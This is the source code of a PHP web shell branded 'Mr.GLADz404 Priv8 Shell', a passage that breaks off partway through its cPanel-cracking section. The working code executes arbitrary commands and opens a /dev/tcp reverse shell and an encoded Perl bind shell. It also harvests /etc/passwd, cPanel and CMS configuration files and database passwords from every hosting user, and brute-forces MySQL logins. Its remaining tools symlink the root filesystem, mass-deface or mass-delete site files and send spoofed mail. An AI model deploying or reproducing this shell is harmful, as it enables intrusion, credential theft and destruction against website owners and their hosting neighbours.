./Mr.GLADz404 PRIV8 SHELL Pertamax Edition

1. <html>
2. <!-------
3. ###############################################################################
4. //  CODED  By ./Mr.GLADz404
5. //  THANKS TO ALLAH S.W.T <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3 <3
6. //  THANKS TO INDOXPLOIT CODERS TEAM & RES7OCK CREW <3
7. //  THANKS TO ALL MY FRIEND :*
8. ###############################################################################
9. -------->
10.   <head>
11.   <link href='http://res7ock.org/assets/img/favicon.png' rel='shortcut icon' alt='icon'>
12.   <title>./Mr.GLADz404 Priv8 Shell</title>
13.   <meta name='author' content='./Mr.GLADz404'>
14.   <meta charset="UTF-8">
15.   <link href="" rel="stylesheet" type="text/css">
16.  
17. <style>
18. body{
19. font-family: "Racing Sans One", cursive;
20. background-color: #e6e6e6;
21. text-shadow:0px 0px 1px #757575;
22. }
23. #content tr:hover{
24. background-color: #636263;
25. text-shadow:0px 0px 10px #fff;
26. }
27. #content .first{
28. background-color: silver;
29. }
30. #content .first:hover{
31. background-color: silver;
32. text-shadow:0px 0px 1px #757575;
33. }
34. table{
35. border: 1px #000000 dotted;
36. }
37. H1{
38. font-family: "Rye", cursive;
39. }
40. a{
41. color: #000;
42. text-decoration: none;
43. }
44. a:hover{
45. color: #fff;
46. text-shadow:0px 0px 10px #FF00FF;
47. }
48. input,select,textarea{
49. border: 1px #000000 solid;
50. -moz-border-radius: 5px;
51. -webkit-border-radius:5px;
52. border-radius:5px;
53. }
54. </style>
55. </head>
56. <?php
57. set_time_limit(0);
58. error_reporting(0);
59.  
60. //function
61. function ambilKata($param, $kata1, $kata2){
62.     if(strpos($param, $kata1) === FALSE) return FALSE;
63.     if(strpos($param, $kata2) === FALSE) return FALSE;
64.     $start = strpos($param, $kata1) + strlen($kata1);
65.     $end = strpos($param, $kata2, $start);
66.     $return = substr($param, $start, $end - $start);
67.     return $return;
68. }
69. if(get_magic_quotes_gpc()) {
70.     function idx_ss($array) {
71.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
72.     }
73.     $_POST = idx_ss($_POST);
74. }
75. function hdd($s) {
76.     if($s >= 1073741824)
77.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
78.     elseif($s >= 1048576)
79.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
80.     elseif($s >= 1024)
81.     return sprintf('%1.2f',$s / 1024 ) .' KB';
82.     else
83.     return $s .' B';
84. }
85. function exe($cmd) {
86.     if(function_exists('system')) {        
87.         @ob_start();      
88.         @system($cmd);    
89.         $buff = @ob_get_contents();        
90.         @ob_end_clean();      
91.         return $buff;  
92.     } elseif(function_exists('exec')) {        
93.         @exec($cmd,$results);      
94.         $buff = "";        
95.         foreach($results as $result) {        
96.             $buff .= $result;      
97.         } return $buff;    
98.     } elseif(function_exists('passthru')) {        
99.         @ob_start();      
100.         @passthru($cmd);      
101.         $buff = @ob_get_contents();        
102.         @ob_end_clean();      
103.         return $buff;  
104.     } elseif(function_exists('shell_exec')) {      
105.         $buff = @shell_exec($cmd);    
106.         return $buff;  
107.     }
108. }
109.  
110. //check dir
111. $nick = "./Mr.GLADz404";
112. if(isset($_GET['path'])){
113. $path = $_GET['path'];
114. }else{
115. $path = getcwd();
116. }
117. $software = getenv("SERVER_SOFTWARE");
118. $path = str_replace('\\','/',$path);
119. $paths = explode('/',$path);
120. $dir = str_replace("\\","/",$dir);
121. $scdir = explode("/", $dir);
122. $freespace = hdd(disk_free_space("/"));
123. $total = hdd(disk_total_space("/"));
124. $used = $total - $freespace;
125. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
126. $ds = (@ini_get("disable_functions"));
127. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
128. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
129. $wget = ('wget --help') ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
130. $perl = ('perl --help') ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
131. $python =('python --help') ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
132. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
133. if(!function_exists('posix_getegid')) {
134.     $user = @get_current_user();
135.     $uid = @getmyuid();
136.     $gid = @getmygid();
137.     $group = "?";
138. } else {
139.     $uid = @posix_getpwuid(posix_geteuid());
140.     $gid = @posix_getgrgid(posix_getegid());
141.     $user = $uid['name'];
142.     $uid = $uid['uid'];
143.     $group = $gid['name'];
144.     $gid = $gid['gid'];
145. }
146. //uname
147. echo "<font color=purple size=2>Time On Server : <font color=lime>".date("d M Y H:i:s",time())."</font></font><br>";
148. echo "<font color=purple size=2>Software: <font color=lime>".$software."</font></font><br>";
149. echo "<font color=purple size=2>System: <font color=lime>".php_uname()."</font></font><br>";
150. echo "<font color=purple size=2>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br></font>";
151. echo "<font color=purple size=2>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></font><br>";
152. echo "<font color=purple size=2>HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font>)</font> <br>";
153. echo "<font color=purple size=2>Safe Mode: $sm <br>";
154. echo "<font color=purple size=2>Disable Functions: $show_ds<br></font>";
155. echo "<font color=purple size=2>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl<br>";
156. echo "<font color=purple size=3>Current DIR: </font>";
157. foreach($paths as $id=>$pat){
158. if($pat == '' && $id == 0){
159. $a = true;
160. echo '<a href="?path=/">/</a>';
161. continue;
162. }
163. if($pat == '') continue;
164. echo '<a href="?path=';
165. for($i=0;$i<=$id;$i++){
166. echo "$paths[$i]";
167. if($i != $id) echo "/";
168. }
169. echo '"><font color=orange size=3>'.$pat.'</font></a>/';
170. }
171.  
172. ##TOOLBAR
173. echo "<hr color=red>
174. <center>
175. <font size=3><a href=?><font color=purple>[<font color=lime>Home</font>]</font></a></font>
176. <font size=3><a href='?path=$path&gladz404=upload'><font color=purple>[<font color=lime>Upload</font>]</font></a></font>
177. <font size=3><a href='?path=$path&gladz404=fake_root'><font color=purple>[<font color=lime>Fake Root</font>]</font></a></font>
178. <font size=3><a href='?path=$path&gladz404=fakemail'><font color=purple>[<font color=lime>Fake Mail</font>]</font></a></font>
179. <font size=3><a href='?path=$path&gladz404=mass_deface'><font color=purple>[<font color=lime>Mass Deface</font>]</font></a></font>
180. <font size=3><a href='?path=$path&gladz404=mass_delete'><font color=purple>[<font color=lime>Mass Delete</font>]</font></a></font>
181. <font size=3><a href='?path=$path&gladz404=config'><font color=purple>[<font color=lime>Config</font>]</font></a></font>
182. <font size=3><a href='?path=$path&gladz404=jumping'><font color=purple>[<font color=lime>Jumping</font>]</font></a></font>
183. <font size=3><a href='?path=$path&gladz404=symlink'><font color=purple>[<font color=lime>Symlink</font>]</font></a></font>
184. <font size=3><a href='?path=$path&gladz404=cpanel'><font color=purple>[<font color=lime>CP Crack</font>]</font></a></font>
185. <br>
186. <font size=3><a href='?path=$path&gladz404=edit_title_wp'><font color=purple>[<font color=lime>Auto Edit Title WP</font>]</font></a></font>
187. <font size=3><a href='?path=$path&gladz404=cgi'><font color=purple>[<font color=lime>CGI Telnet</font>]</font></a></font>
188. <font size=3><a href='?path=$path&gladz404=autodwp'><font color=purple>[<font color=lime>Auto Deface WP</font>]</font></a></font>
189. <font size=3><a href='?path=$path&gladz404=zone-h'><font color=purple>[<font color=lime>Zone-H</font>]</font></a></font>
190. <font size=3><a href='?path=$path&gladz404=smtp'><font color=purple>[<font color=lime>SMTP</font>]</font></a></font>
191. <font size=3><a href='?path=$path&gladz404=bypass_etc'><font color=purple>[<font color=lime>Bypass etc/psswd</font>]</font></a></font>
192. <font size=3><a href='?path=$path&gladz404=magento'><font color=purple>[<font color=lime>Magento Hunter</font>]</font></a></font>
193. <font size=3><a href='?path=$path&gladz404=pepescek'><font color=purple>[<font color=lime>Deface Page Checker</font>]</font></a></font>
194. </center>
195. <hr color=red><center>";
196.  
197.         //uploads
198. if($_GET['gladz404'] == 'upload') {
199. if(isset($_FILES['file'])){
200. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
201. echo '<font color="#FFB6C1">Succes</font><br />';
202. }else{
203. echo '<font color="#87CEFA">Error</font><br />';
204. }
205. }
206. echo '<form enctype="multipart/form-data" method="POST"><font color="#FF1493">
207. Upload File:<br><input type="file" name="file" />
208. <input type="submit" value="UPLOAD" />
209. </form><br>
210. </td></tr>';   
211.  
212.     //FAKE ROOT
213. } elseif($_GET['gladz404'] == "fake_root") {
214.     ob_start();
215.     function reverse($url) {
216.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
217.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
218.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
219.               curl_setopt($ch, CURLOPT_HEADER, 0);
220.               curl_setopt($ch, CURLOPT_POST, 1);
221.         $resp = curl_exec($ch);
222.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
223.         $array = explode(",,", $resp);
224.         unset($array[0]);
225.         foreach($array as $lnk) {
226.             $lnk = "http://$lnk";
227.             $lnk = str_replace(",", "", $lnk);
228.             echo $lnk."\n";
229.             ob_flush();
230.             flush();
231.         }
232.               curl_close($ch);
233.     }
234.     function cek($url) {
235.         $ch = curl_init($url);
236.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
237.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
238.         $resp = curl_exec($ch);
239.         return $resp;
240.     }
241.     $cwd = getcwd();
242.     $ambil_user = explode("/", $cwd);
243.     $user = $ambil_user[2];
244.     if($_POST['reverse']) {
245.         $site = explode("\r\n", $_POST['url']);
246.         $file = $_POST['file'];
247.         foreach($site as $url) {
248.             $cek = cek("$url/~$user/$file");
249.             if(preg_match("/hacked/i", $cek)) {
250.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
251.             }
252.         }
253.     } else {
254.         echo "<center><form method='post'>
255.        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
256.        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
257.        Domain: <br>
258.        <textarea style='width: 450px; height: 250px;' name='url'>";
259.         reverse($_SERVER['HTTP_HOST']);
260.         echo "</textarea><br>
261.        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
262.        </form><br>
263.        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
264.     }
265.    
266. //FAKEMAIL
267. } elseif($_GET['gladz404'] == "fakemail") {
268.     echo '
269. <center><form action="?gladz404=fakemail&dir='.$path.'#down" method="post">
270. <a name="down"></a>
271. <table>
272. <tr>
273. <td>
274. <font color="#FFF"><b>Mail to : </b></font></td><td><input placeholder="email_korban@mail.com" size="30" type="email" name="mailto" />
275. </td>
276. </tr>
277. <tr>
278. <td>
279. <font color="#FFF"><b>From : </b></font></td><td><input type="email" size="30"  placeholder="email_hacker@mail.com" name="mailfrom" />
280. </td>
281. </tr>
282. <tr>
283. <td>
284. <font color="#FFF"><b>Subject : </b></font></td><td><input type="text" size="30"  value="Your Site Has Been Hacked" name="mailsubject" />
285. </td>
286. </tr>
287. </table><br>
288. <textarea rows="6" cols="60" name="mailcontent">
289. Hi Admin :)
290. Your System Is Low
291. Patch Your System
292. I Came , I Saw , I Conguered</textarea>
293. <br><input type="submit" value=">>" name="mailsend" />
294. </form></center><br><br>';
295. if(isset($_POST['mailsend']) && ($_POST['mailsend'] == '>>'))
296. {
297. $mailto = $_POST['mailto'];
298. $mailfrom = $_POST['mailfrom'];
299. $mailsubject = $_POST['mailsubject'];
300. $mailcontent = $_POST['mailcontent'];
301. if(@mail($mailto,$mailsubject,$mailcontent,"FROM:$mailfrom"))
302. { echo '<center><span style="color:green"><b>Mail successfully Sent!</b></span></center>'; }
303. else echo '<center><span style="color:red"><b>Mail Not Sent!</b></span></center>';
304. }
305.  
306. //Network
307. } elseif($_GET['gladz404'] == "network") {
308.     echo "<center><form method='post'>
309.    <u>Bind Port:</u> <br>
310.    PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
311.    <input type='submit' name='sub_bp' value='>>'>
312.    </form>
313.    <form method='post'>
314.    <u>Back Connect:</u> <br>
315.    Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
316.    PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
317.    <input type='submit' name='sub_bc' value='>>'>
318.    </form></center>";
319.     if(isset($_POST['sub_bc'])) {
320.         $ip = $_POST['ip_bc'];
321.         $port = $_POST['port_bc'];
322.         exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
323.     }
324.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
325.     if(isset($_POST['sub_bp'])) {
326.         $f_bp = fopen("/tmp/bp.pl", "w");
327.         fwrite($f_bp, base64_decode($bind_port_p));
328.         fclose($f_bp);
329.  
330.         $port = $_POST['port_bind'];
331.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
332.         sleep(1);
333.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
334.         unlink("/tmp/bp.pl");
335.     }
336.  
337. ##JUMPING
338. } elseif($_GET['gladz404'] == 'jumping') {
339.     $i = 0;
340.     echo "<pre><div class='margin: 5px auto;'>";
341.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
342.     while($passwd = fgets($etc)) {
343.         if($passwd == '' || !$etc) {
344.             echo "<font color=red>Can't read /etc/passwd</font>";
345.         } else {
346.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
347.             foreach($user_jumping[1] as $user_idx_jump) {
348.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
349.                 if(is_readable($user_jumping_dir)) {
350.                     $i++;
351.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
352.                     if(is_writable($user_jumping_dir)) {
353.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
354.                     }
355.                     echo $jrw;
356.                     if(function_exists('posix_getpwuid')) {
357.                         $domain_jump = file_get_contents("/etc/named.conf");  
358.                         if($domain_jump == '') {
359.                             echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
360.                         } else {
361.                             preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
362.                             foreach($domains_jump[1] as $dj) {
363.                                 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
364.                                 $user_jumping_url = $user_jumping_url['name'];
365.                                 if($user_jumping_url == $user_idx_jump) {
366.                                     echo " => ( <u>$dj</u> )<br>";
367.                                     break;
368.                                 }
369.                             }
370.                         }
371.                     } else {
372.                         echo "<br>";
373.                     }
374.                 }
375.             }
376.         }
377.     }
378.     if($i == 0) {
379.     } else {
380.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
381.    
382.     echo "</div></pre>";
383.         }
384.  
385.    
386. //MASS Deface
387. } elseif(isset($_GET['gladz404']) && ($_GET['gladz404'] == 'mass_deface')){
388.     function sabun_massal($dir,$namafile,$isi_script) {
389.         foreach($j as $lokasi)
390.         if(is_writable($dir)) {
391.             $dira = scandir($dir);
392.             foreach($dira as $dirb) {
393.                 $dirc = "$dir/$dirb";
394.                 $lokasi = $dirc.'/'.$namafile;
395.                 if($dirb === '.') {
396.                     file_put_contents($lokasi, $isi_script);
397.                 } elseif($dirb === '..') {
398.                     file_put_contents($lokasi, $isi_script);
399.                 } else {
400.                     if(is_dir($dirc)) {
401.                         if(is_writable($dirc)) {
402.                            
403.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
404.                             file_put_contents($lokasi, $isi_script);
405.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
406.                         }
407.                     }
408.                 }
409.             }
410.         }
411.     }
412.     function sabun_biasa($dir,$namafile,$isi_script) {
413.         if(is_writable($dir)) {
414.             $dira = scandir($dir);
415.             foreach($dira as $dirb) {
416.                 $dirc = "$dir/$dirb";
417.                 $lokasi = $dirc.'/'.$namafile;
418.                 if($dirb === '.') {
419.                     file_put_contents($lokasi, $isi_script);
420.                 } elseif($dirb === '..') {
421.                     file_put_contents($lokasi, $isi_script);
422.                 } else {
423.                     if(is_dir($dirc)) {
424.                         if(is_writable($dirc)) {
425.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
426.                             file_put_contents($lokasi, $isi_script);
427.                         }
428.                     }
429.                 }
430.             }
431.         }
432.     }
433.     if($_POST['start']) {
434.         if($_POST['tipe_sabun'] == 'mahal') {
435.             echo "<div style='margin: 5px auto; padding: 5px'>";
436.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
437.             echo "</div>";
438.         } elseif($_POST['tipe_sabun'] == 'murah') {
439.             echo "<div style='margin: 5px auto; padding: 5px'>";
440.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
441.             echo "</div>";
442.         }
443.     } else {
444.     echo "<center>";
445.     echo "<form method='post'>
446.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
447.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
448.     <font style='text-decoration: underline;'>Folder:</font><br>
449.     <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
450.     <font style='text-decoration: underline;'>Filename:</font><br>
451.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
452.     <font style='text-decoration: underline;'>Index File:</font><br>
453.     <textarea name='script' style='width: 450px; height: 200px;'>HACKED By ./Mr.GLADz404</textarea><br>
454.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
455.     </form></center>";
456.     }
457.     }
458.  
459. //MASS DELETE
460.  elseif($_GET['gladz404'] == 'mass_delete') {
461.     function hapus_massal($dir,$namafile) {
462.         if(is_writable($dir)) {
463.             $dira = scandir($dir);
464.             foreach($dira as $dirb) {
465.                 $dirc = "$dir/$dirb";
466.                 $lokasi = $dirc.'/'.$namafile;
467.                 if($dirb === '.') {
468.                     if(file_exists("$dir/$namafile")) {
469.                         unlink("$dir/$namafile");
470.                     }
471.                 } elseif($dirb === '..') {
472.                     if(file_exists("".dirname($dir)."/$namafile")) {
473.                         unlink("".dirname($dir)."/$namafile");
474.                     }
475.                 } else {
476.                     if(is_dir($dirc)) {
477.                         if(is_writable($dirc)) {
478.                             if(file_exists($lokasi)) {
479.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
480.                                 unlink($lokasi);
481.                                 $idx = hapus_massal($dirc,$namafile);
482.                             }
483.                         }
484.                     }
485.                 }
486.             }
487.         }
488.     }
489.     if($_POST['start']) {
490.         echo "<div style='margin: 5px auto; padding: 5px'>";
491.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
492.         echo "</div>";
493.     } else {
494.     echo "<center>";
495.     echo "<form method='post'>
496.    <font style='text-decoration: underline;'>Folder:</font><br>
497.    <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
498.    <font style='text-decoration: underline;'>Filename:</font><br>
499.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
500.    <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
501.    </form></center>";
502.     }
503.  
504. //CONFIG
505. } elseif($_GET['gladz404'] == 'config') {
506.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
507.     $idx = mkdir("gladz404_config", 0777);
508.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
509.     $htc = fopen("gladz404_config/.htaccess","w");
510.     fwrite($htc, $isi_htc);
511.     while($passwd = fgets($etc)) {
512.         if($passwd == "" || !$etc) {
513.             echo "<font color=red>Can't read /etc/passwd</font>";
514.         } else {
515.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
516.             foreach($user_config[1] as $user_gladz) {
517.                 $user_config_dir = "/home/$user_gladz/public_html/";
518.                 if(is_readable($user_config_dir)) {
519.                     $grab_config = array(
520.                         "/home/$user_gladz/.my.cnf" => "cpanel",
521.                         "/home/$user_gladz/.accesshash" => "WHM-accesshash",
522.                         "/home/$user_gladz/public_html/vdo_config.php" => "Voodoo",
523.                         "/home/$user_gladz/public_html/bw-configs/config.ini" => "BosWeb",
524.                         "/home/$user_gladz/public_html/config/koneksi.php" => "Lokomedia",
525.                         "/home/$user_gladz/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
526.                         "/home/$user_gladz/public_html/clientarea/configuration.php" => "WHMCS",
527.                         "/home/$user_gladz/public_html/whm/configuration.php" => "WHMCS",
528.                         "/home/$user_gladz/public_html/whmcs/configuration.php" => "WHMCS",
529.                         "/home/$user_gladz/public_html/forum/config.php" => "phpBB",
530.                         "/home/$user_gladz/public_html/sites/default/settings.php" => "Drupal",
531.                         "/home/$user_gladz/public_html/config/settings.inc.php" => "PrestaShop",
532.                         "/home/$user_gladz/public_html/app/etc/local.xml" => "Magento",
533.                         "/home/$user_gladz/public_html/joomla/configuration.php" => "Joomla",
534.                         "/home/$user_gladz/public_html/configuration.php" => "Joomla",
535.                         "/home/$user_gladz/public_html/wp/wp-config.php" => "WordPress",
536.                         "/home/$user_gladz/public_html/wordpress/wp-config.php" => "WordPress",
537.                         "/home/$user_gladz/public_html/wp-config.php" => "WordPress",
538.                         "/home/$user_gladz/public_html/admin/config.php" => "OpenCart",
539.                         "/home/$user_gladz/public_html/slconfig.php" => "Sitelok",
540.                         "/home/$user_gladz/public_html/application/config/database.php" => "Ellislab");
541.                     foreach($grab_config as $config => $nama_config) {
542.                         $ambil_config = file_get_contents($config);
543.                         if($ambil_config == '') {
544.                         } else {
545.                             $file_config = fopen("gladz404_config/$user_gladz-$nama_config.txt","w");
546.                             fputs($file_config,$ambil_config);
547.                         }
548.                     }
549.                 }      
550.             }
551.         }  
552.     }
553.     echo "<center><a href='?path=$path/gladz404_config'><font color=lime>Done</font></a></center>";
554. //symlink
555. } elseif(isset($_GET['gladz404']) && ($_GET['gladz404'] == 'symlink')) {     
556.      echo " <form action= method=post>";
557.  @set_time_limit(0);
558.  echo "<center><font color=purple>";
559.  @mkdir('sym',0777);
560. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<br><br><font color='green'>Cant access this file on server -> [ /etc/named.conf ]</font></center>"; } else { echo "<table width='700' border='0' cellpadding='3' cellspacing='1' align='center'><td style='background:darkred;color:white;'>Domains</td><td style='background:darkred;color:white;'>Users</td><td style='background:darkred;color:white;'>Symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<font color=red>".$string[1][0].'</font>'; } echo " <tr> <td><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a>  </td> <td style=border-left:1px solid white;> '.$UID['name']." </td> <td style=border-left:1px solid white;> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr>"; flush(); } } } } echo "</center></table></font>";
561.  
562. //CPANEL CRACK
563. }elseif($_GET['gladz404'] == 'cpanel') {
564.     if($_POST['crack']) {
565.         $usercp = explode("\r\n", $_POST['user_cp']);
566.         $passcp = explode("\r\n", $_POST['pass_cp']);
567.         $i = 0;
568.         foreach($usercp as $ucp) {
569.             foreach($passcp as $pcp) {
570.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
571.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
572.                     } else {
573.                         $_SESSION[$ucp] = "1";
574.                         $_SESSION[$pcp] = "1";
575.                         if($ucp == '' || $pcp == '') {
576.                            
577.                         } else {
578.                             $i++;
579.                             if(function_exists('posix_getpwuid')) {
580.                                 $domain_cp = file_get_contents("/etc/named.conf");
581.                                 if($domain_cp == '') {
582.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
583.                                 } else {
584.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
585.                                     foreach($domains_cp[1] as $dj) {
586.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
587.                                         $user_cp_url = $user_cp_url['name'];
588.                                         if($user_cp_url == $ucp) {
589.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
590.                                             break;
591.                                         }
592.                                     }
593.                                 }
594.                             } else {
595.                                 $dom = "<font color=red>function is Disable by system</font>";
596.                             }
597.                             echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
598.                         }
599.                     }
600.                 }
601.             }
602.         }
603.         if($i == 0) {
604.         } else {
605.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
606.         }
607.     } else {
608.         echo "<center>
609.        <form method='post'>
610.        USER: <br>
611.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
612.         $_usercp = fopen("/etc/passwd","r");
613.         while($getu = fgets($_usercp)) {
614.             if($getu == '' || !$_usercp) {
615.                 echo "<font color=red>Can't read /etc/passwd</font>";
616.             } else {
617.                 preg_match_all("/(.*?):x:/", $getu, $u);
618.                 foreach($u[1] as $user_cp) {
619.                         if(is_dir("/home/$user_cp/public_html")) {
620.                             echo "$user_cp\n";
621.                     }
622.                 }
623.             }
624.         }
625.         echo "</textarea><br>
626.        PASS: <br>
627.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
628.         function cp_pass($dir) {
629.             $pass = "";
630.             $dira = scandir($dir);
631.             foreach($dira as $dirb) {
632.                 if(!is_file("$dir/$dirb")) continue;
633.                 $ambil = file_get_contents("$dir/$dirb");
634.                 if(preg_match("/WordPress/", $ambil)) {
635.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
636.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
637.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
638.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
639.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
640.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
641.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
642.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
643.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
